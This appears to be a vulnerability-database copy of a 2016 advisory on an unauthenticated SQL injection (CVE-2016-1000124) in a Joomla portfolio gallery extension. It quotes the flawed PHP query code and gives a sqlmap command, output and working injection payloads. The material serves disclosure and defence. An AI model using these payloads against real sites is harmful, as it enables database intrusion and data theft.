Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection

🗓️ 16 Sep 2016 00:00:00Reported by Larry W. CashdollarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 37 Views

Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6. Allows attackers to manipulate the database through ajax_url.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Joomla Huge-IT Portfolio Gallery 1.0.6 SQL Injection Vulnerability
3 Oct 201600:00
zdt
0day.today		Joomla Portfolio Gallery 1.0.6 Component - SQL Injection Vulnerability
1 Dec 201600:00
zdt
0day.today		Joomla Huge-IT Portfolio Gallery Plugin 1.0.6 Component - SQL Injection Vulnerability
1 Sep 201700:00
zdt
CNVD		Huge-IT Portfolio Gallery plugin SQL injection vulnerability in Joomla!
12 Oct 201600:00
cnvd
CVE		CVE-2016-1000124
6 Oct 201614:00
cve
Cvelist		CVE-2016-1000124
6 Oct 201614:00
cvelist
Exploit DB		Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
31 Aug 201700:00
exploitdb
EUVD		EUVD-2016-1068
7 Oct 202500:30
euvd
exploitpack		Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
16 Sep 201600:00
exploitpack
exploitpack		Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
31 Aug 201700:00
exploitpack
Rows per page
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:

In file ajax_url.php:

  11 define('_JEXEC',1);
  12 defined('_JEXEC') or die('Restircted access');
.
.
.
  49             $page = $_POST["page"];
  50             $num=$_POST['perpage'];
  51             $start = $page * $num - $num;
  52             $idofgallery=$_POST['galleryid'];
  53             $level = $_POST['level'];
  54             $query = $db->getQuery(true);
  55             $query->select('*');
  56             $query->from('#__huge_itportfolio_images');
  57             $query->where('portfolio_id ='.$idofgallery);
  58             $query ->order('#__huge_itportfolio_images.ordering asc');
  59             $db->setQuery($query,$start,$num);

CVE-ID: CVE-2016-1000124
Export: JSON TEXT XML
Exploit Code:
	• $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"  --level=5 --risk=3
	•  
	•  
	• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
	• sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
	• ---
	• Parameter: #1* ((custom) POST)
	•     Type: error-based
	•     Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
	•     Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
	•  
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•     Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
	• ---
	• [13:30:39] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Debian 8.0 (jessie)
	• web application technology: Apache 2.4.10
	• back-end DBMS: MySQL >= 5.0.12
	• [13:30:39] [WARNING] HTTP error codes detected during run:
	• 500 (Internal Server Error) - 2715 times
	• [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
	•  
	• [*] shutting down at 13:30:39
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=170

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Sep 2016 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 39.8
EPSS0.0227
joomlasql injectionunauthenticatedhuge-it portfolio gallerycve-2016-1000124vulnerabilityexploit code
37